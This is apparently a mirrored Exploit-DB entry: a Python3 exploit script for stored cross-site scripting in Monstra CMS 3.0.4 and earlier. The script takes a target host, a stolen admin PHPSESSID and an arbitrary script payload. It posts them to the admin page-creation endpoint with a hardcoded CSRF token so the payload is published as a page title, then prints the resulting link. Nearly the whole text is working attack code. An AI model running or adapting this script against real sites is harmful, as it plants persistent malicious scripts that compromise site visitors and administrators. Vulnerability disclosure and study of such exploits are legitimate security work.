Monstra CMS < 3.0.4 - Cross-Site Scripting (1) - 体验盒子

作者： DEEPIN2
日期： 2018-06-07
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/44855/
# Title: Monstra CMS < 3.0.4 - Cross-Site Scripting
# Date: 2018-06-07
# Author: DEEPIN2
# Software: Monstra CMS
# Version: 3.0.4 and earlier
# This automation code requires Python3
# You must intercept the first request through the proxy tool to verify the CSRF token.

import requests
import re

def runXSS(target, cookie, data):
	exploit = requests.post(target, cookies=cookie, data=data).text
	if re.search('exploit', exploit):
		return 'OK'
	else:
		return 'ERROR'
	
if __name__ == '__main__':
	print('''______ _______ ____ ____________ ____
 / ___\ \ / / ____| |___ \ / _ \/ |( _ )/ |/ _ \/ / |( _ )
| |\ \ / /|_| _____ __) | | | | |/ _ \ _____| | | | | | |/ _ `
| |___\ V / | |__|_____/ __/| |_| | | (_) |_____| | |_| | | | (_) |
 \____|\_/|_____| |_____|\___/|_|\___/|_|\___/|_|_|\___/
 	[*] Author : DEEPIN2(Junseo Lee)
---------------------------------------------------------------------''')
	print('[*] Ex) http://www.target.com -> www.target.com')
	url = input('Target : ')
	print('[*] Required admin\'s PHPSESSID.')
	PHPSESSID = input('PHPSESSID : ')
	pagename = input('Pagename : ')
	script = input('Script : ')
	target = 'http://' + url + '/admin/index.php?id=pages&action=add_page'
	cookie = {'PHPSESSID':PHPSESSID}
	data = {'csrf':'9c1763649f4e5ce611d29ef5cd10914fa61e91f5',\
			'page_title':script,\
			'page_name':pagename,\
			'page_meta_title':'',\
			'page_keywords':'',\
			'page_description':'',\
			'pages':0,\
			'templates':'index',\
			'status':'published',\
			'access':'public',\
			'editor':'',\
			'page_tags':'',\
			'add_page_and_exit':'Save+and+Exit',\
			'page_date':'9999-99-99'}

	result = runXSS(target, cookie, data)
	print('-' * 69)
	if result == 'OK':
		print('[+] LINK : http://' + url + '/' + pagename)
	else:
		print('[-] Error')